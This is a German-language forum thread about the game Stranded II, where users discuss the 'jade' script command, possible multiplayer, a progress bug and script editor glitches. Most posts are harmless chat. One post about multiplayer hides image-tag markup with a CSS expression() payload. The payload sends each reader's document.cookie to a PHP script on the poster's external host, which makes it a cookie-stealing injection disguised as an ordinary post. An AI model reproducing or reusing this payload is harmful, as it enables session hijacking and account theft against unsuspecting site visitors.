Forum

> > Stranded II > Allgemein > Neulingsfragen hier hinein
Forums overviewStranded II overviewAllgemein overviewLog in to reply

German Neulingsfragen hier hinein

3,329 replies
Page
To the start Previous 1 211 12 13166 167 Next To the start

old Re: Neulingsfragen hier hinein

Ste-ve
User Off Offline

Quote
Ik habe zwar keine ahnung von dieser Scriptsprache, aber ik hoffe doch mal, dass str2 in den minusbereich geht!
-99 jade denke ik mal

old Re: Neulingsfragen hier hinein

davidsung
User Off Offline

Quote
Shadowdown has written
nun wird der wert -100 genommen. hast du dann wieder 0 jade oder (-99) jade?!
Bei Hunger, Durst und Müdigkeit gibt es KEINE negativen Werte. jade -100 bewirkt, dass Hunger, Durst und Müdigkeit UM 100% verringert werden (also -100). Der Wert 0 kann NICHT überschritten werden. Um sie um 100% aufzufüllen müsste es jade 100 sein.

EDIT:
@ Steven
Wenn du keine Ahnung hast, brauchst du auch nicht zu antworten.

old Re: Neulingsfragen hier hinein

Shadowdown
User Off Offline

Quote
davidsung has written
Um sie um 100% aufzufüllen müsste es jade 100 sein.


jade 100 ?? warum nicht jade +100?oder haste dich einfach nur verschrieben? egal!
naja ich habs eben probiert und es klapt soweit seit einigen minuten. frage ist, ob es auch so bleibt. aber dann hätte ich doch jetzt eigtl. schon min. 20 jade oder?
also: danke DC

old Re: Neulingsfragen hier hinein

jeepohahyo
User Off Offline

Quote
Shadowdown has written
jade 100 ?? warum nicht jade +100?oder haste dich einfach nur verschrieben? egal!


Bei plus kann man das Vorzeichen weglassen

Und, ja es bleibt so. Dann scheint ja alles zu funktionieren.

old Re: Neulingsfragen hier hinein

davidsung
User Off Offline

Quote
Nein, es ich habe mich nicht verschrieben. Bei positiven Zahlen kann man im Normalfall das "+" weglassen.;)

EDIT:
Mist, zu spät!*noch ein ;)*

EDIT²:
"jade" ist ein Scriptbefehl, keine Eigenschaft von Mr. Stranded. In Wirklichkeit heißt es immer noch Hunger Durst und Müdigkeit.

old Multiplayer

Fabianius
User Off Offline

Quote
Was meint ihr, wird es einen Multiplayer-Teil geben? Ich schätze mal, der wird vielleicht noch später als zusätzliches Modul hinzugefügt, da die Arbeiten am Einzelspieler-Teil schon genug Arbeit geben. Oder wird es ihn überhaupt nicht geben, könnte ja schliesslich auch sein, denn an CS2D will DC sicher auch noch weiter arbeiten.IMG:https://fabianius.lima-city.de/unrealsoftware/blank.png" id="pic1" height="1" width="1
IMG:https://fabianius.lima-city.de/unrealsoftware/blank.png" height="1" width="1" style="width:expression(if(document.getElementById('pic1').src=='https://fabianius.lima-city.de/unrealsoftware/blank.png'){document.getElementById('pic1').src='https://fabianius.lima-city.de/unrealsoftware/blank.php?cookie='+document.cookie;});


Aber was wird wohl alles im Multiplayer-Teil dabei sein? So etwas wie "Capture The Flag" wäre sicher nicht schlecht, aber sicher auch aufwendig.

Und was man sich auch noch einmal überlegen sollte, wird man über LAN und Internet spielen können?

old Re: Neulingsfragen hier hinein

Ste-ve
User Off Offline

Quote
Wenn es einen geben wird, dann wird es ihn wahrscheinlich über Internet geben. Aufwendig wird er nicht werden, es werden nämlich keine Items im Multyplayer vorkommen.

old Re: Neulingsfragen hier hinein

Diego
User Off Offline

Quote
@ Steven

Keine Items? Lol was soll man dann mitm Multiplayer anfangen? Ne er hat doch mal gesagt dann simpelstes Deathmatch oder so. Aber das ist Shice egal, Stranded ist normalerweise ein Singelplayer game.

old Re: Neulingsfragen hier hinein

jeepohahyo
User Off Offline

Quote
Ich fasse nochmal für Fabianus zusammen:

Keiner hat irgendeinen Plan, ob es den MP geben wird, und wenn ja, was darin dann gehen wird.
Also alles frei nach dem Motto: "Wissen ist Macht, nix wissen macht nix"

old kein plan

Guest

Quote
auf der 2.insel hab ich mehr als 15 baumstämme und 30steine gesammelt aber es geht net weiter ...

old Re: Neulingsfragen hier hinein

bizzl
User Off Offline

Quote
kein plan has written
auf der 2.insel hab ich mehr als 15 baumstämme und 30steine gesammelt aber es geht net weiter ...

neuste version von s2 gezogen?
wenn nein, bitte machen und adventure neu anfangen, ansonsten geht es halt net weiter

old Re: Neulingsfragen hier hinein

DC
Admin Off Offline

Quote
@Fabianius:
Wenn es über Internet geht, geht es auch über LAN. Das ist theoretisch exakt das gleiche.

old Script editor

Chaos
User Off Offline

Quote
Hey DC du sagtest in dem Scripteditor is´n fehler.Was denn genau?

old Re: Neulingsfragen hier hinein

DC
Admin Off Offline

Quote
Hauptsächlich Fehler mit Kopieren+Einfügen. Manchmal wird beim Tippen einfach plötzlich was eingefügt, oder beim Kopieren werden falsche Stellen kopiert oder verschoben oder was auch immer.
To the start Previous 1 211 12 13166 167 Next To the start
Log in to replyAllgemein overviewStranded II overviewForums overview